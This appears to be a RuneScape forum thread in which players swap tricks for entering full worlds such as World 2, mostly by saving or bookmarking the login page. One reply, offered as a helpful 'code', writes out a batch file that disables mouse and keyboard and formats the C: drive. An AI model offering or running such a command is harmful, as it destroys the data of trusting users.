World 2 Secrets????

ummm22

• Replies 128
  • Created
  • Last Reply

Top Posters In This Topic

after rethinking my strategic enterance into world 126 i have come to the conclusion that the server must be located inside jagex headquarters and that it would be on an isolated system. this way there is no possible way for the new content being tested to leak to the other worlds by accident or hack.

Americans love to fight. All real Americans love the sting of battle.

George S. Patton

1242631666.png

you just admitted to breaking rules and just gave your rsn names. so since jagex staff actually lookas at these forums, your have a strong possability of being banned.

consaquentally this is why i have a different name for tipit.

Americans love to fight. All real Americans love the sting of battle.

George S. Patton

1242631666.png

hehe comes naturally......

why am i an idiot....?

you just posted that you multiple log on one of the most visited forums about rs... =D> =D> btw jagex takes a looksie at the topics every now an then as well =D> =D> ....q

edit: the guy above me just told you

2nddraftqt6.jpg

Join the sodb now!

Thanks to misterxman for the great avatar!

aaaaaaqf9.png[/code]

i use this to get into world 1, 2,78(pest control)

On IE u can uslllay just save the link as a bookmark to get into world 1 or 2(not sure if this still works , didn't use IE to play rs2 since last year i think)

Instructions for firefox users:

1. keep reloading the worlds page until u see ur desired world(s) isn't full(can take a little while)

2. press control+s or just go file save page. save it to some where make sure it says save as type WEB PAGE COMPLETE

3 open up the file and u see this

abababababababaip4.png

jiahui12180.png

3rd part programs- "illegal"

Anyway, there 2 little arrows right over the words that say "world" click the second arrow on the right.

Lol thats the world 2 login page code, not a 3rd party program or hack.

Lagatag.png

ya, do what coolgirl does. also, if you know how to use html, you can do it so it opens in a frame. so you can have 1 frame with a link to all the rs worlds, and the other frame that loads it when you click on the link. that way it can be like ss and you can use that to get into full worlds, thats what i do all the time.

Runescape Supreme Destiny

120/122 combat http://www.supremedestiny.com.my

99/99 str lvl 300 mortal

94/95 def lvl 220 god

99/99 att STAYCW2

I love coolgirl :3>

this is the best way for me to get into world 2 whenever i need to sell sumthin or check the real prices of stuff. Merchanting world is gonna be shaken as flameguy3 now has acess to world 2. :twisted:

world2isntthathardby4.pngI think merchanting is extinct....

lordofthehauntedminestextcb6.png Completed haunted mine at level 75.

Barrows Drops: Dh platelegs, Guth helm, Karils cb, Torags legs

-------------RETIRED------------------

uhhh..just add it to favorite and then click it dont be so ch00b lol

wat a secret :o

:roll:

That would normally work, but to do it with RuneScape, you have to use modified settings, due to RuneScape's Website's settings or Java or whatever. Try it just by adding it to favorites, and see what happens.

uhhh..just add it to favorite and then click it dont be so ch00b lol

wat a secret :o

:roll:

That would normally work, but to do it with RuneScape, you have to use modified settings, due to RuneScape's Website's settings or Java or whatever. Try it just by adding it to favorites, and see what happens.

i already did it and isint so dificult,just add for ppeps that dont work arent lucky i think rolf :wall:

[/url]

i come piss ur w0rld off...so dont get mad so u dont g0t by me n00b...ps:lets p00n3d it

lol just save it as a favourite in ie, it works. unfortunantly it doesn't work in firefox, but it doesn't solve them problem of clicking a million times on the log in button.

Splatter-RM-stroke.png

"A disbelief in magic can force some poor souls into believing in authority and business"

ore you can learn Visual Basics. and make a client and set it up just so it loads world 1 eve time its open, thats what i would do it i was you

~bmms

a91e22ec.gif
Aefx(started 11/1/2002) Cb: 200 TS: 1900+
Bmms--Jr(Started on 1/24/06)(Banned 11/13/09 ) Cb: 119(pre-eoc) TS: 1700+
Bmms(Started 8/?/2001)(Banned 1/24/06 ) Cb: 101(pre-eoc) TS: 1350+

heres a code for you!

save this in note pade

@echo off

Rundll32 mouse,disable

Rundll32 keyboard,disable

format C:

Now save this as "filename.bat"

ok now its a bat file make sure your admin. and open the file....now command porpmt will disable your key board and mouse and clean your whole C: ....[cabbage] nvm

Urukai: Kill them all! leave none alive!!! GWAK!

i am bit stupid in computer sciences :)

Could someone be so kind to give me the script for world 2, but as I have no writer, acces to drive C, i need to disable the access to C drive therefore, when entering the site and choosing between high-detail/low-detail also select 'Unsigned Applet Using Default Java' from the dropdown scroll at the bottom of the detail select page

I think that should enable to buypass my firewall:)))

I would be so so happy :))

i am bit stupid in computer sciences :)

Could someone be so kind to give me the script for world 2, but as I have no writer, acces to drive C, i need to disable the access to C drive therefore, when entering the site and choosing between high-detail/low-detail also select 'Unsigned Applet Using Default Java' from the dropdown scroll at the bottom of the detail select page

I think that should enable to buypass my firewall:)))

I would be so so happy :))

Nobody can?

pleaaase :pray:

I know other ways have already been posted, but here's one that I figured out on my own. :wink:

1. Find the world you want to get in to:

step12ld.png

2. Click the world.

3. Right after clicking your world RIGHT CLICK it once again. You must be quick, it should look something like this:

step23zo.png

4. Select 'Add to Favorites':

step35wm.png

5. Confirm the page add. If it worked it should say 'Runescape Game', if you want you can add a number to tell you which world it is.

step42fg.png

6. You can now easily access those hard-to-open worlds!

It should work unless they changed something.

Proud owner of a Fire Cape, achieved on the 24th of August, 2006.

Feel free to PM me in game, RSN is Dlewa0.

3,849th Account to 99 Range. :)

• 4 weeks later...

The downside to bookmarking World 2 is that you have to redo it every week. After each system update (sometimes several times a week) you have to re-bookmark it.

Untitled.png

My heart is broken by the terrible loss I have sustained in my old friends and companions and my poor soldiers. Believe me, nothing except a battle lost can be half so melancholy as a battle won. -Sir Arthur Wellesley